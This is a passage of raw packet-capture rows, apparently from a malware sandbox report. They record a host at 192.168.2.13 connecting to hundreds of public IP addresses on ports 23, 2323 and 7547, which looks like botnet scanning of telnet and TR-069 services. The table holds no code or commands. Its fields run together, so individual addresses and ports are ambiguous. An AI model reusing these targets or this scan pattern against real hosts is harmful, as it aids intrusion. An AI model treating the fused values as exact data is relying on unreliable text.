                                          Nov 7, 2024 11:57:59.393672943 CET30567547192.168.2.1398.84.202.77
                                          Nov 7, 2024 11:57:59.393676043 CET23331289.230.194.39192.168.2.13
                                          Nov 7, 2024 11:57:59.393682003 CET30567547192.168.2.13133.176.106.231
                                          Nov 7, 2024 11:57:59.393682003 CET30567547192.168.2.13102.10.179.90
                                          Nov 7, 2024 11:57:59.393687963 CET233312189.31.251.3192.168.2.13
                                          Nov 7, 2024 11:57:59.393688917 CET30567547192.168.2.13171.114.235.173
                                          Nov 7, 2024 11:57:59.393697977 CET23233312125.181.17.33192.168.2.13
                                          Nov 7, 2024 11:57:59.393701077 CET30567547192.168.2.13122.240.31.3
                                          Nov 7, 2024 11:57:59.393711090 CET30567547192.168.2.1340.20.88.134
                                          Nov 7, 2024 11:57:59.393713951 CET30567547192.168.2.1389.58.189.82
                                          Nov 7, 2024 11:57:59.393716097 CET2333125.152.43.85192.168.2.13
                                          Nov 7, 2024 11:57:59.393719912 CET331223192.168.2.1389.230.194.39
                                          Nov 7, 2024 11:57:59.393722057 CET331223192.168.2.13189.31.251.3
                                          Nov 7, 2024 11:57:59.393722057 CET30567547192.168.2.13170.229.100.50
                                          Nov 7, 2024 11:57:59.393728018 CET23331283.250.69.30192.168.2.13
                                          Nov 7, 2024 11:57:59.393728018 CET33122323192.168.2.13125.181.17.33
                                          Nov 7, 2024 11:57:59.393731117 CET30567547192.168.2.1327.81.101.203
                                          Nov 7, 2024 11:57:59.393731117 CET30567547192.168.2.13162.82.40.111
                                          Nov 7, 2024 11:57:59.393738985 CET23331296.169.164.205192.168.2.13
                                          Nov 7, 2024 11:57:59.393743038 CET30567547192.168.2.13188.132.202.212
                                          Nov 7, 2024 11:57:59.393743992 CET30567547192.168.2.1395.173.167.157
                                          Nov 7, 2024 11:57:59.393748999 CET233312204.234.43.204192.168.2.13
                                          Nov 7, 2024 11:57:59.393750906 CET30567547192.168.2.1376.124.83.227
                                          Nov 7, 2024 11:57:59.393750906 CET30567547192.168.2.1358.219.131.31
                                          Nov 7, 2024 11:57:59.393758059 CET30567547192.168.2.13122.221.134.133
                                          Nov 7, 2024 11:57:59.393760920 CET331223192.168.2.135.152.43.85
                                          Nov 7, 2024 11:57:59.393760920 CET233312162.12.58.82192.168.2.13
                                          Nov 7, 2024 11:57:59.393760920 CET30567547192.168.2.13114.221.164.73
                                          Nov 7, 2024 11:57:59.393760920 CET331223192.168.2.1383.250.69.30
                                          Nov 7, 2024 11:57:59.393764973 CET30567547192.168.2.13220.54.114.216
                                          Nov 7, 2024 11:57:59.393771887 CET331223192.168.2.1396.169.164.205
                                          Nov 7, 2024 11:57:59.393771887 CET30567547192.168.2.13198.173.174.97
                                          Nov 7, 2024 11:57:59.393780947 CET233312155.138.168.74192.168.2.13
                                          Nov 7, 2024 11:57:59.393780947 CET30567547192.168.2.13104.66.78.77
                                          Nov 7, 2024 11:57:59.393785954 CET331223192.168.2.13204.234.43.204
                                          Nov 7, 2024 11:57:59.393785954 CET331223192.168.2.13162.12.58.82
                                          Nov 7, 2024 11:57:59.393791914 CET233312125.151.240.216192.168.2.13
                                          Nov 7, 2024 11:57:59.393795013 CET30567547192.168.2.13202.186.82.80
                                          Nov 7, 2024 11:57:59.393795013 CET30567547192.168.2.1317.34.106.113
                                          Nov 7, 2024 11:57:59.393802881 CET233312102.132.189.71192.168.2.13
                                          Nov 7, 2024 11:57:59.393805027 CET30567547192.168.2.13166.91.166.199
                                          Nov 7, 2024 11:57:59.393814087 CET23233312111.157.139.113192.168.2.13
                                          Nov 7, 2024 11:57:59.393819094 CET331223192.168.2.13155.138.168.74
                                          Nov 7, 2024 11:57:59.393819094 CET30567547192.168.2.13183.131.92.234
                                          Nov 7, 2024 11:57:59.393826962 CET30567547192.168.2.1343.56.160.36
                                          Nov 7, 2024 11:57:59.393827915 CET30567547192.168.2.13165.253.45.34
                                          Nov 7, 2024 11:57:59.393831968 CET2333129.187.193.218192.168.2.13
                                          Nov 7, 2024 11:57:59.393837929 CET30567547192.168.2.13212.35.67.210
                                          Nov 7, 2024 11:57:59.393837929 CET331223192.168.2.13102.132.189.71
                                          Nov 7, 2024 11:57:59.393841028 CET33122323192.168.2.13111.157.139.113
                                          Nov 7, 2024 11:57:59.393841982 CET30567547192.168.2.13117.164.31.87
                                          Nov 7, 2024 11:57:59.393841982 CET331223192.168.2.13125.151.240.216
                                          Nov 7, 2024 11:57:59.393843889 CET23331236.217.213.80192.168.2.13
                                          Nov 7, 2024 11:57:59.393853903 CET233312108.214.80.231192.168.2.13
                                          Nov 7, 2024 11:57:59.393856049 CET30567547192.168.2.1395.219.20.39
                                          Nov 7, 2024 11:57:59.393857002 CET30567547192.168.2.13115.132.40.192
                                          Nov 7, 2024 11:57:59.393863916 CET233312179.96.128.90192.168.2.13
                                          Nov 7, 2024 11:57:59.393865108 CET331223192.168.2.1336.217.213.80
                                          Nov 7, 2024 11:57:59.393867970 CET30567547192.168.2.13188.199.118.26
                                          Nov 7, 2024 11:57:59.393872976 CET331223192.168.2.139.187.193.218
                                          Nov 7, 2024 11:57:59.393872976 CET30567547192.168.2.1354.51.164.207
                                          Nov 7, 2024 11:57:59.393872976 CET30567547192.168.2.13192.69.116.27
                                          Nov 7, 2024 11:57:59.393873930 CET23331276.177.247.21192.168.2.13
                                          Nov 7, 2024 11:57:59.393884897 CET23331271.205.20.97192.168.2.13
                                          Nov 7, 2024 11:57:59.393886089 CET30567547192.168.2.13223.125.105.154
                                          Nov 7, 2024 11:57:59.393896103 CET30567547192.168.2.13140.144.152.161
                                          Nov 7, 2024 11:57:59.393897057 CET23331296.123.209.80192.168.2.13
                                          Nov 7, 2024 11:57:59.393898010 CET30567547192.168.2.13171.177.203.26
                                          Nov 7, 2024 11:57:59.393908024 CET233312155.229.191.136192.168.2.13
                                          Nov 7, 2024 11:57:59.393908978 CET30567547192.168.2.13156.105.201.12
                                          Nov 7, 2024 11:57:59.393913984 CET331223192.168.2.13179.96.128.90
                                          Nov 7, 2024 11:57:59.393913984 CET30567547192.168.2.13148.61.234.173
                                          Nov 7, 2024 11:57:59.393914938 CET30567547192.168.2.13190.23.196.205
                                          Nov 7, 2024 11:57:59.393925905 CET30567547192.168.2.13133.11.39.59
                                          Nov 7, 2024 11:57:59.393925905 CET30567547192.168.2.1325.89.144.210
                                          Nov 7, 2024 11:57:59.393925905 CET30567547192.168.2.13204.27.23.163
                                          Nov 7, 2024 11:57:59.393925905 CET331223192.168.2.13108.214.80.231
                                          Nov 7, 2024 11:57:59.393925905 CET331223192.168.2.1371.205.20.97
                                          Nov 7, 2024 11:57:59.393925905 CET30567547192.168.2.1385.53.20.135
                                          Nov 7, 2024 11:57:59.393930912 CET23331249.145.15.60192.168.2.13
                                          Nov 7, 2024 11:57:59.393925905 CET331223192.168.2.1376.177.247.21
                                          Nov 7, 2024 11:57:59.393938065 CET331223192.168.2.1396.123.209.80
                                          Nov 7, 2024 11:57:59.393942118 CET30567547192.168.2.13170.82.41.50
                                          Nov 7, 2024 11:57:59.393943071 CET233312211.154.151.25192.168.2.13
                                          Nov 7, 2024 11:57:59.393949986 CET30567547192.168.2.1398.4.104.178
                                          Nov 7, 2024 11:57:59.393949986 CET30567547192.168.2.13105.203.237.253
                                          Nov 7, 2024 11:57:59.393949986 CET30567547192.168.2.13195.38.57.127
                                          Nov 7, 2024 11:57:59.393950939 CET331223192.168.2.13155.229.191.136
                                          Nov 7, 2024 11:57:59.393954039 CET233312193.169.27.197192.168.2.13
                                          Nov 7, 2024 11:57:59.393965006 CET233312172.103.205.253192.168.2.13
                                          Nov 7, 2024 11:57:59.393965960 CET331223192.168.2.1349.145.15.60
                                          Nov 7, 2024 11:57:59.393969059 CET30567547192.168.2.13167.166.237.11
                                          Nov 7, 2024 11:57:59.393970013 CET331223192.168.2.13211.154.151.25
                                          Nov 7, 2024 11:57:59.393970966 CET30567547192.168.2.13114.199.252.180
                                          Nov 7, 2024 11:57:59.393978119 CET233312130.61.228.56192.168.2.13
                                          Nov 7, 2024 11:57:59.393980980 CET30567547192.168.2.1313.137.143.65
                                          Nov 7, 2024 11:57:59.393989086 CET233312136.126.137.204192.168.2.13
                                          Nov 7, 2024 11:57:59.393996000 CET331223192.168.2.13193.169.27.197
                                          Nov 7, 2024 11:57:59.393997908 CET30567547192.168.2.13146.209.8.203
                                          Nov 7, 2024 11:57:59.393997908 CET30567547192.168.2.13158.131.57.213
                                          Nov 7, 2024 11:57:59.393999100 CET233312137.197.174.188192.168.2.13
                                          Nov 7, 2024 11:57:59.394000053 CET331223192.168.2.13172.103.205.253
                                          Nov 7, 2024 11:57:59.394009113 CET30567547192.168.2.1385.88.81.46
                                          Nov 7, 2024 11:57:59.394009113 CET30567547192.168.2.1374.246.88.246
                                          Nov 7, 2024 11:57:59.394018888 CET30567547192.168.2.13141.55.46.50
                                          Nov 7, 2024 11:57:59.394021034 CET30567547192.168.2.13120.29.176.198
                                          Nov 7, 2024 11:57:59.394021988 CET331223192.168.2.13130.61.228.56
                                          Nov 7, 2024 11:57:59.394021988 CET30567547192.168.2.13208.251.253.91
                                          Nov 7, 2024 11:57:59.394022942 CET30567547192.168.2.1360.116.64.241
                                          Nov 7, 2024 11:57:59.394022942 CET30567547192.168.2.13144.181.117.200
                                          Nov 7, 2024 11:57:59.394026041 CET30567547192.168.2.1338.107.228.45
                                          Nov 7, 2024 11:57:59.394041061 CET331223192.168.2.13137.197.174.188
                                          Nov 7, 2024 11:57:59.394040108 CET331223192.168.2.13136.126.137.204
                                          Nov 7, 2024 11:57:59.394040108 CET30567547192.168.2.1364.61.85.148
                                          Nov 7, 2024 11:57:59.394043922 CET30567547192.168.2.13190.179.130.5
                                          Nov 7, 2024 11:57:59.394043922 CET30567547192.168.2.13190.114.62.188
                                          Nov 7, 2024 11:57:59.394051075 CET233312108.97.218.58192.168.2.13
                                          Nov 7, 2024 11:57:59.394063950 CET30567547192.168.2.1382.131.146.214
                                          Nov 7, 2024 11:57:59.394064903 CET30567547192.168.2.131.93.171.255
                                          Nov 7, 2024 11:57:59.394069910 CET30567547192.168.2.13217.200.223.214
                                          Nov 7, 2024 11:57:59.394083023 CET30567547192.168.2.13159.73.62.174
                                          Nov 7, 2024 11:57:59.394083977 CET30567547192.168.2.139.91.172.184
                                          Nov 7, 2024 11:57:59.394083977 CET30567547192.168.2.13113.244.226.59
                                          Nov 7, 2024 11:57:59.394083023 CET30567547192.168.2.13190.219.191.159
                                          Nov 7, 2024 11:57:59.394083977 CET331223192.168.2.13108.97.218.58
                                          Nov 7, 2024 11:57:59.394083977 CET30567547192.168.2.13216.95.97.54
                                          Nov 7, 2024 11:57:59.394097090 CET30567547192.168.2.13196.153.191.28
                                          Nov 7, 2024 11:57:59.394103050 CET30567547192.168.2.13220.240.189.194
                                          Nov 7, 2024 11:57:59.394103050 CET30567547192.168.2.131.49.218.43
                                          Nov 7, 2024 11:57:59.394104958 CET30567547192.168.2.13222.81.101.117
                                          Nov 7, 2024 11:57:59.394119978 CET30567547192.168.2.1344.9.212.171
                                          Nov 7, 2024 11:57:59.394119978 CET30567547192.168.2.13204.150.166.86
                                          Nov 7, 2024 11:57:59.394126892 CET30567547192.168.2.13117.200.6.55
                                          Nov 7, 2024 11:57:59.394138098 CET30567547192.168.2.1383.249.191.239
                                          Nov 7, 2024 11:57:59.394138098 CET30567547192.168.2.13144.173.164.207
                                          Nov 7, 2024 11:57:59.394138098 CET30567547192.168.2.1357.128.200.115
                                          Nov 7, 2024 11:57:59.394149065 CET30567547192.168.2.13173.158.211.134
                                          Nov 7, 2024 11:57:59.394149065 CET30567547192.168.2.1338.24.76.190
                                          Nov 7, 2024 11:57:59.394149065 CET30567547192.168.2.131.151.210.67
                                          Nov 7, 2024 11:57:59.394166946 CET30567547192.168.2.1383.64.109.128
                                          Nov 7, 2024 11:57:59.394174099 CET30567547192.168.2.13170.73.118.124
                                          Nov 7, 2024 11:57:59.394174099 CET30567547192.168.2.13155.101.185.192
                                          Nov 7, 2024 11:57:59.394180059 CET30567547192.168.2.13185.159.16.63
                                          Nov 7, 2024 11:57:59.394181013 CET30567547192.168.2.1372.227.146.7
                                          Nov 7, 2024 11:57:59.394181013 CET30567547192.168.2.1362.70.3.169
                                          Nov 7, 2024 11:57:59.394186974 CET30567547192.168.2.1345.145.247.167
                                          Nov 7, 2024 11:57:59.394201994 CET30567547192.168.2.13212.108.29.162
                                          Nov 7, 2024 11:57:59.394202948 CET30567547192.168.2.1324.254.242.216
                                          Nov 7, 2024 11:57:59.394205093 CET30567547192.168.2.13144.208.36.177
                                          Nov 7, 2024 11:57:59.394217968 CET30567547192.168.2.13165.216.176.250
                                          Nov 7, 2024 11:57:59.394218922 CET30567547192.168.2.13101.182.82.164
                                          Nov 7, 2024 11:57:59.394218922 CET30567547192.168.2.1350.232.149.169
                                          Nov 7, 2024 11:57:59.394218922 CET30567547192.168.2.13210.16.197.79
                                          Nov 7, 2024 11:57:59.394220114 CET30567547192.168.2.13135.140.218.139
                                          Nov 7, 2024 11:57:59.394220114 CET30567547192.168.2.13116.223.16.108
                                          Nov 7, 2024 11:57:59.394220114 CET30567547192.168.2.1380.51.147.253
                                          Nov 7, 2024 11:57:59.394218922 CET30567547192.168.2.13126.154.25.150
                                          Nov 7, 2024 11:57:59.394222975 CET3591423192.168.2.1346.245.97.144
                                          Nov 7, 2024 11:57:59.394222975 CET30567547192.168.2.13192.143.28.149
                                          Nov 7, 2024 11:57:59.394227982 CET30567547192.168.2.13206.228.77.209
                                          Nov 7, 2024 11:57:59.394228935 CET30567547192.168.2.1386.238.70.224
                                          Nov 7, 2024 11:57:59.394228935 CET30567547192.168.2.13136.176.191.134
                                          Nov 7, 2024 11:57:59.394236088 CET30567547192.168.2.13121.163.31.170
                                          Nov 7, 2024 11:57:59.394237995 CET30567547192.168.2.13160.140.130.74
                                          Nov 7, 2024 11:57:59.394237995 CET30567547192.168.2.13116.38.2.20
                                          Nov 7, 2024 11:57:59.394237995 CET30567547192.168.2.1337.23.249.215
                                          Nov 7, 2024 11:57:59.394239902 CET30567547192.168.2.13115.47.58.75
                                          Nov 7, 2024 11:57:59.394239902 CET30567547192.168.2.13184.250.252.194
                                          Nov 7, 2024 11:57:59.394243956 CET30567547192.168.2.1344.71.193.210
                                          Nov 7, 2024 11:57:59.394248009 CET30567547192.168.2.13147.138.216.209
                                          Nov 7, 2024 11:57:59.394248009 CET30567547192.168.2.1390.203.82.130
                                          Nov 7, 2024 11:57:59.394248009 CET30567547192.168.2.1317.239.237.75
                                          Nov 7, 2024 11:57:59.394248962 CET30567547192.168.2.1335.43.157.14
                                          Nov 7, 2024 11:57:59.394258022 CET30567547192.168.2.13132.219.24.107
                                          Nov 7, 2024 11:57:59.394260883 CET30567547192.168.2.13223.89.205.49
                                          Nov 7, 2024 11:57:59.394262075 CET30567547192.168.2.13180.11.66.146
                                          Nov 7, 2024 11:57:59.394262075 CET30567547192.168.2.13112.211.236.119
                                          Nov 7, 2024 11:57:59.394262075 CET30567547192.168.2.1394.60.149.132
                                          Nov 7, 2024 11:57:59.394265890 CET30567547192.168.2.1397.21.230.239
                                          Nov 7, 2024 11:57:59.394265890 CET30567547192.168.2.13209.239.239.47
                                          Nov 7, 2024 11:57:59.394265890 CET30567547192.168.2.13184.180.236.38
                                          Nov 7, 2024 11:57:59.394267082 CET30567547192.168.2.13201.108.232.34
                                          Nov 7, 2024 11:57:59.394265890 CET30567547192.168.2.13171.221.9.184
                                          Nov 7, 2024 11:57:59.394267082 CET30567547192.168.2.13160.19.89.152
                                          Nov 7, 2024 11:57:59.394265890 CET30567547192.168.2.13152.51.58.124
                                          Nov 7, 2024 11:57:59.394267082 CET30567547192.168.2.13149.243.232.166
                                          Nov 7, 2024 11:57:59.394285917 CET30567547192.168.2.13222.202.27.161
                                          Nov 7, 2024 11:57:59.394289017 CET30567547192.168.2.1397.2.80.43
                                          Nov 7, 2024 11:57:59.394290924 CET30567547192.168.2.1336.129.69.233
                                          Nov 7, 2024 11:57:59.394299984 CET30567547192.168.2.13117.8.239.82
                                          Nov 7, 2024 11:57:59.394303083 CET30567547192.168.2.13146.91.9.52
                                          Nov 7, 2024 11:57:59.394304037 CET30567547192.168.2.1363.218.5.0
                                          Nov 7, 2024 11:57:59.394304037 CET30567547192.168.2.1367.138.241.190
                                          Nov 7, 2024 11:57:59.394308090 CET30567547192.168.2.1343.74.101.169
                                          Nov 7, 2024 11:57:59.394310951 CET30567547192.168.2.1331.20.193.245
                                          Nov 7, 2024 11:57:59.394330978 CET30567547192.168.2.13140.144.34.239
                                          Nov 7, 2024 11:57:59.394330978 CET30567547192.168.2.13136.18.175.148
                                          Nov 7, 2024 11:57:59.394330978 CET30567547192.168.2.13189.190.248.82
                                          Nov 7, 2024 11:57:59.394331932 CET30567547192.168.2.1360.124.223.183
                                          Nov 7, 2024 11:57:59.394331932 CET30567547192.168.2.13213.253.15.141
                                          Nov 7, 2024 11:57:59.394331932 CET30567547192.168.2.13201.166.64.92
                                          Nov 7, 2024 11:57:59.394331932 CET30567547192.168.2.1367.19.13.77
                                          Nov 7, 2024 11:57:59.394335032 CET30567547192.168.2.13201.139.255.149
                                          Nov 7, 2024 11:57:59.394336939 CET30567547192.168.2.13113.101.50.219
                                          Nov 7, 2024 11:57:59.394337893 CET30567547192.168.2.13165.126.38.133
                                          Nov 7, 2024 11:57:59.394337893 CET30567547192.168.2.13177.127.190.61
                                          Nov 7, 2024 11:57:59.394337893 CET30567547192.168.2.1347.176.196.254
                                          Nov 7, 2024 11:57:59.394345045 CET30567547192.168.2.13223.213.113.37
                                          Nov 7, 2024 11:57:59.394345045 CET30567547192.168.2.13154.191.191.104
                                          Nov 7, 2024 11:57:59.394345045 CET30567547192.168.2.1351.50.105.36
                                          Nov 7, 2024 11:57:59.394349098 CET30567547192.168.2.1358.153.59.1
                                          Nov 7, 2024 11:57:59.394350052 CET30567547192.168.2.13135.50.166.223
                                          Nov 7, 2024 11:57:59.394350052 CET30567547192.168.2.1386.190.29.97
                                          Nov 7, 2024 11:57:59.394350052 CET30567547192.168.2.1382.156.80.24
                                          Nov 7, 2024 11:57:59.394352913 CET30567547192.168.2.1396.157.194.57
                                          Nov 7, 2024 11:57:59.394352913 CET30567547192.168.2.1394.203.140.193
                                          Nov 7, 2024 11:57:59.394352913 CET30567547192.168.2.1337.113.176.131
                                          Nov 7, 2024 11:57:59.394367933 CET30567547192.168.2.1325.101.61.41
                                          Nov 7, 2024 11:57:59.394370079 CET30567547192.168.2.13133.71.122.183
                                          Nov 7, 2024 11:57:59.394371033 CET30567547192.168.2.135.189.70.95
                                          Nov 7, 2024 11:57:59.394372940 CET30567547192.168.2.13212.205.113.85
                                          Nov 7, 2024 11:57:59.394386053 CET30567547192.168.2.13164.133.14.124
                                          Nov 7, 2024 11:57:59.394388914 CET30567547192.168.2.1350.251.9.145
                                          Nov 7, 2024 11:57:59.394388914 CET30567547192.168.2.13108.114.244.119
                                          Nov 7, 2024 11:57:59.394392014 CET30567547192.168.2.13207.49.249.117
                                          Nov 7, 2024 11:57:59.394408941 CET30567547192.168.2.13153.91.226.146
                                          Nov 7, 2024 11:57:59.394408941 CET30567547192.168.2.1362.153.32.220
                                          Nov 7, 2024 11:57:59.394409895 CET30567547192.168.2.1361.17.167.221
                                          Nov 7, 2024 11:57:59.394412994 CET30567547192.168.2.1342.180.151.16
                                          Nov 7, 2024 11:57:59.394416094 CET30567547192.168.2.1331.237.126.198
                                          Nov 7, 2024 11:57:59.394416094 CET30567547192.168.2.13119.82.116.23
                                          Nov 7, 2024 11:57:59.394418955 CET30567547192.168.2.13141.214.240.148
                                          Nov 7, 2024 11:57:59.394431114 CET30567547192.168.2.13112.197.3.59
                                          Nov 7, 2024 11:57:59.394431114 CET30567547192.168.2.1365.230.80.126
                                          Nov 7, 2024 11:57:59.394433022 CET30567547192.168.2.1358.124.210.163
                                          Nov 7, 2024 11:57:59.394433022 CET30567547192.168.2.13211.228.229.193
                                          Nov 7, 2024 11:57:59.394433022 CET30567547192.168.2.1359.69.127.176
                                          Nov 7, 2024 11:57:59.394438982 CET30567547192.168.2.13174.115.97.57
                                          Nov 7, 2024 11:57:59.394438982 CET30567547192.168.2.1376.78.66.48
                                          Nov 7, 2024 11:57:59.394439936 CET30567547192.168.2.13111.111.91.219
                                          Nov 7, 2024 11:57:59.394439936 CET30567547192.168.2.1364.5.138.0
                                          Nov 7, 2024 11:57:59.394439936 CET30567547192.168.2.13166.84.217.146
                                          Nov 7, 2024 11:57:59.394447088 CET30567547192.168.2.1361.87.225.90
                                          Nov 7, 2024 11:57:59.394448996 CET30567547192.168.2.13146.192.34.192
                                          Nov 7, 2024 11:57:59.394450903 CET30567547192.168.2.13212.93.249.56
                                          Nov 7, 2024 11:57:59.394454956 CET30567547192.168.2.13100.187.207.223
                                          Nov 7, 2024 11:57:59.394454956 CET30567547192.168.2.1364.207.20.176
                                          Nov 7, 2024 11:57:59.394464016 CET30567547192.168.2.1313.159.58.85
                                          Nov 7, 2024 11:57:59.394464970 CET30567547192.168.2.1392.169.49.145
                                          Nov 7, 2024 11:57:59.394467115 CET30567547192.168.2.1375.210.169.148
                                          Nov 7, 2024 11:57:59.394467115 CET30567547192.168.2.13121.214.150.254
                                          Nov 7, 2024 11:57:59.394467115 CET30567547192.168.2.13172.241.199.159
                                          Nov 7, 2024 11:57:59.394467115 CET30567547192.168.2.1342.42.122.92
                                          Nov 7, 2024 11:57:59.394467115 CET30567547192.168.2.1396.74.176.196
                                          Nov 7, 2024 11:57:59.394471884 CET30567547192.168.2.13206.25.113.178
                                          Nov 7, 2024 11:57:59.394473076 CET30567547192.168.2.13101.138.88.126
                                          Nov 7, 2024 11:57:59.394478083 CET30567547192.168.2.13199.157.144.183
                                          Nov 7, 2024 11:57:59.394479990 CET30567547192.168.2.13181.99.147.125
                                          Nov 7, 2024 11:57:59.394479990 CET30567547192.168.2.13159.14.189.39
                                          Nov 7, 2024 11:57:59.394484043 CET30567547192.168.2.13156.97.205.74
                                          Nov 7, 2024 11:57:59.394484043 CET30567547192.168.2.13131.176.169.77
                                          Nov 7, 2024 11:57:59.394484997 CET30567547192.168.2.13123.40.193.206
                                          Nov 7, 2024 11:57:59.394485950 CET30567547192.168.2.13210.133.208.115
                                          Nov 7, 2024 11:57:59.394485950 CET30567547192.168.2.13208.228.129.218
                                          Nov 7, 2024 11:57:59.394493103 CET30567547192.168.2.13113.216.205.154
                                          Nov 7, 2024 11:57:59.394494057 CET30567547192.168.2.13133.97.107.189
                                          Nov 7, 2024 11:57:59.394494057 CET30567547192.168.2.13201.149.85.116
                                          Nov 7, 2024 11:57:59.394494057 CET30567547192.168.2.13169.34.234.16
                                          Nov 7, 2024 11:57:59.394505024 CET30567547192.168.2.1336.133.103.72
                                          Nov 7, 2024 11:57:59.394520044 CET30567547192.168.2.1386.205.197.118
                                          Nov 7, 2024 11:57:59.394520044 CET30567547192.168.2.13183.229.73.172
                                          Nov 7, 2024 11:57:59.394520044 CET30567547192.168.2.13196.44.219.25
                                          Nov 7, 2024 11:57:59.394534111 CET30567547192.168.2.13208.18.198.186
                                          Nov 7, 2024 11:57:59.394537926 CET30567547192.168.2.1365.162.204.134
                                          Nov 7, 2024 11:57:59.394539118 CET30567547192.168.2.13163.155.7.92
                                          Nov 7, 2024 11:57:59.394539118 CET30567547192.168.2.1335.94.142.171
                                          Nov 7, 2024 11:57:59.394543886 CET30567547192.168.2.13212.78.22.247
                                          Nov 7, 2024 11:57:59.394552946 CET30567547192.168.2.13151.139.28.69
                                          Nov 7, 2024 11:57:59.394553900 CET30567547192.168.2.1375.10.154.77
                                          Nov 7, 2024 11:57:59.394567966 CET30567547192.168.2.1360.72.131.165
                                          Nov 7, 2024 11:57:59.394570112 CET30567547192.168.2.13122.237.182.204
                                          Nov 7, 2024 11:57:59.394583941 CET30567547192.168.2.131.193.129.87
                                          Nov 7, 2024 11:57:59.394584894 CET30567547192.168.2.13139.250.37.3
                                          Nov 7, 2024 11:57:59.394586086 CET30567547192.168.2.1323.141.225.79
                                          Nov 7, 2024 11:57:59.394587994 CET30567547192.168.2.13145.24.223.6
                                          Nov 7, 2024 11:57:59.394587994 CET30567547192.168.2.13212.164.100.102
                                          Nov 7, 2024 11:57:59.394594908 CET30567547192.168.2.13183.249.196.221
                                          Nov 7, 2024 11:57:59.394606113 CET30567547192.168.2.13201.142.108.27
                                          Nov 7, 2024 11:57:59.394610882 CET30567547192.168.2.1323.145.207.13
                                          Nov 7, 2024 11:57:59.394618034 CET30567547192.168.2.1313.203.69.223
                                          Nov 7, 2024 11:57:59.394618988 CET30567547192.168.2.1357.72.254.31
                                          Nov 7, 2024 11:57:59.394623995 CET30567547192.168.2.1361.35.21.161
                                          Nov 7, 2024 11:57:59.394625902 CET23331231.24.0.171192.168.2.13
                                          Nov 7, 2024 11:57:59.394637108 CET233312115.47.144.218192.168.2.13
                                          Nov 7, 2024 11:57:59.394639015 CET30567547192.168.2.13153.152.11.193
                                          Nov 7, 2024 11:57:59.394639015 CET30567547192.168.2.1339.105.48.204
                                          Nov 7, 2024 11:57:59.394640923 CET30567547192.168.2.13138.92.207.176
                                          Nov 7, 2024 11:57:59.394642115 CET233312154.108.216.182192.168.2.13
                                          Nov 7, 2024 11:57:59.394650936 CET23233312209.69.174.152192.168.2.13
                                          Nov 7, 2024 11:57:59.394653082 CET30567547192.168.2.1324.232.61.32
                                          Nov 7, 2024 11:57:59.394653082 CET30567547192.168.2.13213.154.206.205
                                          Nov 7, 2024 11:57:59.394659042 CET30567547192.168.2.13148.42.95.164
                                          Nov 7, 2024 11:57:59.394659042 CET30567547192.168.2.13124.176.184.206
                                          Nov 7, 2024 11:57:59.394659996 CET30567547192.168.2.1399.158.112.214
                                          Nov 7, 2024 11:57:59.394661903 CET30567547192.168.2.13165.60.83.126
                                          Nov 7, 2024 11:57:59.394663095 CET331223192.168.2.1331.24.0.171
                                          Nov 7, 2024 11:57:59.394665003 CET30567547192.168.2.13203.138.140.162
                                          Nov 7, 2024 11:57:59.394680023 CET30567547192.168.2.1396.214.108.20
                                          Nov 7, 2024 11:57:59.394684076 CET331223192.168.2.13154.108.216.182
                                          Nov 7, 2024 11:57:59.394685030 CET331223192.168.2.13115.47.144.218
                                          Nov 7, 2024 11:57:59.394689083 CET33122323192.168.2.13209.69.174.152
                                          Nov 7, 2024 11:57:59.394692898 CET30567547192.168.2.1397.12.33.88
                                          Nov 7, 2024 11:57:59.394695044 CET30567547192.168.2.13188.191.215.66
                                          Nov 7, 2024 11:57:59.394695997 CET23331281.137.96.73192.168.2.13
                                          Nov 7, 2024 11:57:59.394711018 CET30567547192.168.2.1324.77.107.132
                                          Nov 7, 2024 11:57:59.394711018 CET30567547192.168.2.13100.36.201.224
                                          Nov 7, 2024 11:57:59.394711018 CET30567547192.168.2.13151.244.25.170
                                          Nov 7, 2024 11:57:59.394711971 CET30567547192.168.2.1313.147.59.232
                                          Nov 7, 2024 11:57:59.394714117 CET23331232.74.34.211192.168.2.13
                                          Nov 7, 2024 11:57:59.394721031 CET30567547192.168.2.13217.171.180.152
                                          Nov 7, 2024 11:57:59.394721031 CET30567547192.168.2.13154.92.238.146
                                          Nov 7, 2024 11:57:59.394722939 CET30567547192.168.2.13189.252.174.28
                                          Nov 7, 2024 11:57:59.394725084 CET23331241.85.32.86192.168.2.13
                                          Nov 7, 2024 11:57:59.394730091 CET331223192.168.2.1381.137.96.73
                                          Nov 7, 2024 11:57:59.394731045 CET30567547192.168.2.13105.223.212.19
                                          Nov 7, 2024 11:57:59.394731045 CET30567547192.168.2.1314.113.215.177
                                          Nov 7, 2024 11:57:59.394737005 CET23331264.21.69.253192.168.2.13
                                          Nov 7, 2024 11:57:59.394746065 CET30567547192.168.2.1335.194.23.172
                                          Nov 7, 2024 11:57:59.394747019 CET2323331271.106.215.185192.168.2.13
                                          Nov 7, 2024 11:57:59.394747019 CET30567547192.168.2.1335.191.36.108
                                          Nov 7, 2024 11:57:59.394747972 CET331223192.168.2.1332.74.34.211
                                          Nov 7, 2024 11:57:59.394747019 CET30567547192.168.2.13134.70.116.12
                                          Nov 7, 2024 11:57:59.394756079 CET30567547192.168.2.13219.39.27.216
                                          Nov 7, 2024 11:57:59.394756079 CET331223192.168.2.1341.85.32.86
                                          Nov 7, 2024 11:57:59.394757032 CET30567547192.168.2.1332.128.200.139
                                          Nov 7, 2024 11:57:59.394757986 CET2333124.217.222.109192.168.2.13
                                          Nov 7, 2024 11:57:59.394771099 CET233312201.189.103.92192.168.2.13
                                          Nov 7, 2024 11:57:59.394773960 CET30567547192.168.2.13169.183.237.105
                                          Nov 7, 2024 11:57:59.394773960 CET30567547192.168.2.1335.88.47.84
                                          Nov 7, 2024 11:57:59.394776106 CET331223192.168.2.1364.21.69.253
                                          Nov 7, 2024 11:57:59.394776106 CET30567547192.168.2.13217.252.135.97
                                          Nov 7, 2024 11:57:59.394782066 CET233312194.183.189.139192.168.2.13
                                          Nov 7, 2024 11:57:59.394783974 CET33122323192.168.2.1371.106.215.185
                                          Nov 7, 2024 11:57:59.394789934 CET331223192.168.2.134.217.222.109
                                          Nov 7, 2024 11:57:59.394792080 CET23331289.25.4.248192.168.2.13
                                          Nov 7, 2024 11:57:59.394794941 CET331223192.168.2.13201.189.103.92
                                          Nov 7, 2024 11:57:59.394798994 CET30567547192.168.2.1378.230.23.217
                                          Nov 7, 2024 11:57:59.394803047 CET23331293.41.60.41192.168.2.13
                                          Nov 7, 2024 11:57:59.394813061 CET23331281.192.103.135192.168.2.13
                                          Nov 7, 2024 11:57:59.394814968 CET30567547192.168.2.1388.45.227.87
